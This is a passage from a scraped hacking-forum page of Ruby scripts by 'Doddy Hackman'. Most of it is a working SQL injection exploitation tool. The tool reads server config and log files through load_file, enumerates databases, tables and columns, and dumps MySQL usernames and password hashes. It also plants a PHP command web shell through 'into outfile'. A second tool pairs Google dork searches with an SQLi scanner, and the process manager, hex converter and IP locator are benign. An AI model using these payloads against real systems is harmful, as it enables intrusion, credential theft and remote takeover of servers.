\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog'] def toma(web) return Net::HTTP.get_response(URI.parse(web)).body end def copyright() print "\n\n(C) Doddy Hackman 2012\n\n" gets.chomp end def installer() dir = Dir::pwd+"/"+"logs_webs" if not FileTest::directory?(dir) Dir::mkdir(dir) end end def encodehex(texto) return "0x"+(texto.unpack('H*')[0]) end def savefile(file,text) url = URI.parse(file) save = File.open("logs_webs/"+url.host+".txt","a") save.puts text+"\n" save.close end def bypass(op) if op=="--" return "+","--" elsif op=="/*" return "/**/","/**/" elsif op=="%20" return "%20","%00" else return "+","--" end end def head() print " @ @@ @ @@ @ @ @@ @ @@ @ @ @ @ @ @ @@@ @ @ @ @ @@ @ @@@ @ @ @@ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @@@ @@@@@ " end def volverinicio() print "\n\n[+] Press any key to continue\n\n" gets.chomp inicio() end def clean() if RUBY_PLATFORM=~/win/ system("cls") else system("clear") end end def retorno(url,by) print "\n\n[+] Press any key to continue\n\n" gets.chomp central(url,by) end def gettables(url,by) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))") print "\n\n[+] Getting tables ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Tables Found : ",total,"\n\n" savefile(url,"\n[+] Tables Found : #{total}\n") for num in ("17"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Table Found : "+table+"\n" savefile(url,"[+] Table Found : #{table}") end end else print "[-] Not Found\n" end end def getcolumns(url,by,tablex) tablexa = encodehex(tablex) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))") print "\n\n[+] Getting columns ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Columns Found : ",total,"\n\n" savefile(url,"\n[+] Table : #{tablex}") savefile(url,"[+] Columns Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Column Found : "+table+"\n" savefile(url,"[+] Column Found : #{table}") end end else print "[-] Not Found\n" end end def getdbs(url,by) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))") print "\n\n[+] Getting DBS ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] DBS Found : ",total,"\n\n" savefile(url,"\n[+] DBS Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] DB Found : "+table+"\n" savefile(url,"[+] DB Found : #{table}") end end else print "[-] Not Found\n" end end def gettablesbydb(url,by,dbx) data = encodehex(dbx) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))") print "\n\n[+] Getting tables ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Tables Found : ",total,"\n\n" savefile(url,"\n[+] DBS : #{dbx}") savefile(url,"[+] Tables Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Table Found : "+table+"\n" savefile(url,"[+] Table Found : #{table}") end end else print "[-] Not Found\n" end end def getcolumnsbydb(url,by,db,tab) data = encodehex(db) tabx = encodehex(tab) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))") print "\n\n[+] Getting columns ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Columns Found : ",total,"\n\n" savefile(url,"\n[+] DB : #{db}") savefile(url,"[+] Table : #{tab}") savefile(url,"[+] Columns Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Column Found : "+table+"\n" savefile(url,"[+] Column Found : #{table}") end end else print "[-] Not Found\n" end end def mysqluser(url,by) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))") print "\n\n[+] Searching mysql.user\n\n" code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Users Mysql Found : ",total,"\n\n" savefile(url,"[+] Users Mysql Found : "+total+"\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/ host,user,passw = $1,$2,$3 print "[Host] : "+host print " [User] : "+user print " [Pass] : "+passw+"\n" savefile(url,"[Host] : "+host) savefile(url,"[User] : "+user) savefile(url,"[Pass] : "+passw+"\n") end end else print "[-] Not Found\n" end end def details(url,by) pass1,pass2 = bypass(by) hextest = "0x2f6574632f706173737764" #/etc/passwd hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt web1 = url.sub(/hackman/,"0x4b30425241") web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)") web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))") print "\n\n[+] Extrating information of the DB\n\n" code1 = toma(web2) if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/ user,data,ver = $1,$2,$3 print "\n[+] Username : "+user print "\n[+] Database : "+data print "\n[+] Version : "+ver+"\n\n" savefile(url,"\n[+] Username : "+user) savefile(url,"[+] Database : "+data) savefile(url,"[+] Version : "+ver+"\n") else print "[-] Not Found\n" end code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) code4 = toma(web3) if code2=~/K0BRA/ print "[+] Mysqluser : ON\n" savefile(url,"[+] Mysqluser : ON") end if code3=~/K0BRA/ print "[+] information_schema : ON\n" savefile(url,"[+] information_schema : ON") end if code4=~/ERTOR854/ print "[+] load_file : ON\n" savefile(url,"[+] load_file : ON") end savefile(url,"") #espacio en blanco end def dumper(url,by,table,col1,col2) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))") print "\n\n[+] Getting Values ...\n\n" code1 = toma(web1+pass1+"from"+pass1+table+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 savefile(url,"\n[+] Table : "+table) savefile(url,"[+] Column 1 : "+col1) savefile(url,"[+] Column 2 : "+col2) print "[+] Values Found : ",total,"\n\n" savefile(url,"\n[+] Values Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/ uno,dos = $1,$2 print "\n[+] "+col1+" : "+uno+"\n" print "[+] "+col2+" : "+dos+"\n" savefile(url,"\n[+] "+col1+" : "+uno) savefile(url,"[+] "+col2+" : "+dos) end end else print "[-] Not Found\n" end end def fuzzfile(url,by) pass1,pass2 = bypass(by) print "\n\n[+] Fuzzing Files with load_file ....\n" $files.each do |file| res = file file = file.chomp file = encodehex(file) web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))") code = toma(web1) if code=~/ERTOR854(.*?)ERTOR854/m print "\n\n[File Found] : ",res print "\n\n[Source Start]\n" print $1 print "\n[Source End]" savefile(url,"\n[File Found] : "+res) savefile(url,"\n[Source Start]\n") savefile(url,$1) savefile(url,"\n[Source End]") end end end def abrirfile(url,by,file) pass1,pass2 = bypass(by) print "\n\n[+] Opening file ....\n" res = file file = encodehex(file) web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))") code = toma(web1) if code=~/ERTOR854(.*?)ERTOR854/m print "\n\n[File Found] : ",res print "\n\n[Source Start]\n" print $1 print "\n[Source End]" savefile(url,"\n[File Found] : "+res) savefile(url,"\n[Source Start]\n") savefile(url,$1) savefile(url,"\n[Source End]") else print "\n\n[-] Error\n\n" end end def into(url,by,full,dir) pass1,pass2 = bypass(by) linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e" lugar = full+"/cmd.php" lugardos = dir+"/cmd.php" h = URI.parse(url) webtest = "http://"+h.host+lugardos web1 = url.sub(/hackman/,linea) formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2 toma(formandoweb) code = toma(webtest) if code=~/Mini Shell By Doddy/ print "\n\n[shell up] : "+webtest+"\n" savefile(url,"\n[shell up] : "+webtest+"\n") else print "\n\n[-] Error\n" end end def central(url,by) clean() head() print "\n\n[+] Page : #{url}\n" print "[+] ByPass : #{by}\n\n\n" print "\n[information_schema]\n\n" print "1 - Show tables\n" print "2 - Show columns of the a table\n" print "3 - Show databases\n" print "4 - Show tables from the a DB\n" print "5 - Show columns from the a table of the DB\n" print "\n[mysql.user]\n\n" print "6 - Show users\n" print "\n[Others]\n\n" print "7 - Show details\n" print "8 - Dump data\n" print "9 - Fuzz Files with load_file\n" print "10 - Load files with load_file\n" print "11 - Create Shell\n" print "12 - Show log\n" print "13 - Change target\n" print "14 - Exit\n\n" print "[+] Option : " op = gets.chomp if op == "1" gettables(url,by) retorno(url,by) elsif op == "2" print "\n\n[+] Table : " table = gets.chomp getcolumns(url,by,table) retorno(url,by) elsif op == "3" getdbs(url,by) retorno(url,by) elsif op == "4" print "\n\n[+] DB : " db = gets.chomp gettablesbydb(url,by,db) retorno(url,by) elsif op == "5" print "\n\n[+] DB : " db = gets.chomp print "\n\n[+] Table : " tab = gets.chomp getcolumnsbydb(url,by,db,tab) retorno(url,by) elsif op == "6" mysqluser(url,by) retorno(url,by) elsif op == "7" details(url,by) retorno(url,by) elsif op == "8" print "\n\n[+] Table : " table = gets.chomp print "\n\n[+] Column 1 : " col1 = gets.chomp print "\n\n[+] Column 2 : " col2 = gets.chomp dumper(url,by,table,col1,col2) retorno(url,by) elsif op == "9" fuzzfile(url,by) retorno(url,by) elsif op == "10" print "\n\n[+] File : " file = gets.chomp abrirfile(url,by,file) retorno(url,by) elsif op == "11" print "\n\n[Full Source Discloure] : " full = gets.chomp print "\n\n[Directory to test] : " dir = gets.chomp into(url,by,full,dir) retorno(url,by) elsif op == "12" urla = URI.parse(url) ar = "logs_webs/"+urla.host+".txt" system("start #{ar}") retorno(url,by) elsif op == "13" inicio() elsif op == "14" copyright() else retorno(url,by) end end def findlength(url,by) pass1,pass2 = bypass(by) z = "1" x = "concat(0x4b30425241,1,0x4b30425241)" for num in ('2'..'25') z = z+","+num x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)" code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x) if code=~/K0BRA(.*?)K0BRA/ print "[+] The Page has "+num+" columns\n" print "[+] The number "+$1+" print data" z = z.sub($1,"hackman") sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z savefile(url,"[+] SQLI : "+sqli) savefile(url,"[+] Bypass : "+by+"\n") central(sqli,by) end end end def testvul(page,by) pass1,pass2 = bypass(by) print "\n\n[+] Testing vulnerability ...\n\n" codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2) codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2) if codeuno != codedos print "[+] Vulnerable !\n" findlength(page,by) else print "[-] Not vulnerable\n" print "\n\n[+] Scan anyway y/n : " op = gets.chomp if op == "y" findlength(page,by) else volverinicio() end end end def inicio() clean() head() print "\n\n[+] Page : " page = gets.chomp print "\n\n[+] Bypass : " by = gets.chomp if page=~/hackman/ central(page,by) else testvul(page,by) end end installer() inicio() # The End ?
|
|
|
287
|
Programación / Scripting / [Ruby] ManProcess 0.1
|
en: 16 Febrero 2012, 18:14 pm
|
Un simple programa para manejar los procesos en Windows. #!usr/bin/ruby #ManProcess 0.1 #Coded By Doddy H require "win32ole" def head() print "\n\n-- == Man Process 0.1 == --\n\n" end def copyright() print "\n\n(C) Doddy Hackman 2012\n\n" exit(1) end def retor() print "\n\n[+] Press any key to continue\n\n" gets.chomp end while 1 head() print "1 - Show Process\n" print "2 - Close Process\n" print "3 - Exit\n\n\n" print "[+] Option : " op = gets.chomp if op == "1" print "\n\n[+] Getting process...\n\n" nave = WIN32OLE.connect("winmgmts://") pro = nave.ExecQuery("select * from win32_process") pro.each do |po| print "[+] Name : ",po.Caption," [+] PID : ",po.ProcessId,"\n" end retor() elsif op == "2" print "\n\n[+] Name : " name = gets.chomp k = WIN32OLE.connect("winmgmts://") control = k.ExecQuery("select * from Win32_process where name='#{name}'") control.each do |pro| pro.Terminate end print "\n\n[+] Process Closed\n\n" gets.chomp elsif op == "3" copyright() else print "\n\n[-] Bad Option\n\n" retor() end end # The End ?
|
|
|
288
|
Programación / Scripting / [Ruby] Hex Converter 0.1
|
en: 16 Febrero 2012, 18:12 pm
|
Un simple codigo para convertir texto a hex. #!usr/bin/ruby #Hex Converter 0.1 #Coded By Doddy H def head() print "\n -- == Hex Converter 0.1 == --\n" end def copyright() print "\n\n(C) Doddy Hackman 2012\n\n" exit(1) end def sintax() print "\n\n[+] ruby hex.rb <text>\n" end def encodehex(texto) return "0x"+(texto.unpack('H*')[0]) end def hex(texto) print "\n\n[+] Text : #{texto}\n" print "[+] Result : "+encodehex(texto)+"\n\n" end texto = ARGV[0] head() if !texto sintax() else hex(texto) end copyright() # The End ?
|
|
|
289
|
Programación / Scripting / [Ruby] Google Search 0.3
|
en: 11 Febrero 2012, 23:06 pm
|
Un buscador de google , con la opcion de poder hacer un scanner SQLI en las paginas encontradas. #!usr/bin/ruby #Google Search 0.3 #Coded By Doddy H require "net/http" def toma(web) return Net::HTTP.get_response(URI.parse(web)).body end def openwords(file) if File.file?(file) print "[+] Opening file\n\n" ar = File.open(file) lineas = ar.readlines ar.close print "[+] Number of words : ",lineas.length,"\n\n" return lineas else print "[-] Error opening file\n" end end def head() print " @@@@ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @@@@ @ @@@ @ @@@ @@@ @@ @@@ @ @@ @ @@@ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @@@@@ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @@@ @@@ @@@@ @ @@@ @@@ @@@ @@@@ @ @@@ @ @ @ @@@@ " end def retor() print "\n\n[+] Press any key to continue\n\n" gets.chomp menu() end def copyright() print "\n\n(C) Doddy Hackman 2012\n\n" exit(1) end def about() print " This program was written by Doddy in the summer of 2012, I will not take responsibility for any misuse that can be given to the program was written only for educational purposes. Any questions or suggestions please contact me my mail lepuke [at] hotmail.com " end def googlear(string,cantidad) print "\n\n[+] Searching ....\n\n" string = string.sub(/ /,"+") contador = 0 guardo = [] for i in ("1"..cantidad) contador+=10 url = "http://www.google.com.ar/search?hl=&q=#{string}&start=#{contador}" code = toma(url) links = URI::extract(code) links.each do |link| if link=~/cache:(.*?):(.*?)\+/ guardo.push($2) end end end guardo = guardo.uniq print "\n\n[+] Pages Count : ",guardo.length,"\n\n" return guardo end def savefile(file,text) save = File.open(file, "a") save.puts text+"\n" save.close end def menu() head() print "\n\n1 - Search in google\n" print "2 - Scan SQLI\n" print "3 - About\n" print "4 - Exit" print "\n\n[Option] : " op = gets.chomp if op == "1" print "\n\n[+] String : " string = gets.chomp print "\n\n[+] Pages : " pages = gets.chomp total = googlear(string,pages) total.each do |to| print "[Link] : ",to,"\n" savefile(string+".txt",to) end retor() elsif op=="2" print "\n\n[+] File : " fi = gets.chomp paginas = openwords(fi) print "[+] Scanning ..\n\n\n" paginas.each do |pag| pag = pag.chomp if pag=~/(.*)=(.*)/ final = $1+"=" code = toma(final+"1+and+1=0+union+select+1--") if code=~/The used SELECT statements have a different number of columns/ print "[SQLI] : "+final+"\n" end end end print "\n\n[+] Finished\n\n" retor() elsif op =="3" about() gets.chomp menu() elsif op=="4" copyright() else menu() end end menu() # The End ?
|
|
|
290
|
Programación / Scripting / [Ruby] IP Locator 0.1
|
en: 11 Febrero 2012, 23:06 pm
|
Un localizador de IP. #!usr/bin/ruby #IP Locator 0.1 #Coded By Doddy H require "net/http" require "resolv" def uso print "\n[+] iplocator.rb <site>\n" end def toma(web) return Net::HTTP.get_response(URI.parse(web)).body end def head() print "\n\n -- == IP Locator 0.1 == --\n\n" end def copyright() print "\n\n\n(C) Doddy Hackman 2012\n\n" exit(1) end target = ARGV[0] head() if !target uso() else ip = Resolv.getaddress(target) web = "http://www.melissadata.com/lookups/iplocation.asp?ipaddress="+ip print "\n\n[+] Getting info\n\n\n" code = toma(web) if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ print "[+] City : "+$2+"\n"; end if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ print "[+] Country : "+$2+"\n"; end if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ print "[+] State or Region : "+$2+"\n"; end end copyright() # The End ?
|
|
|
|
|
|
|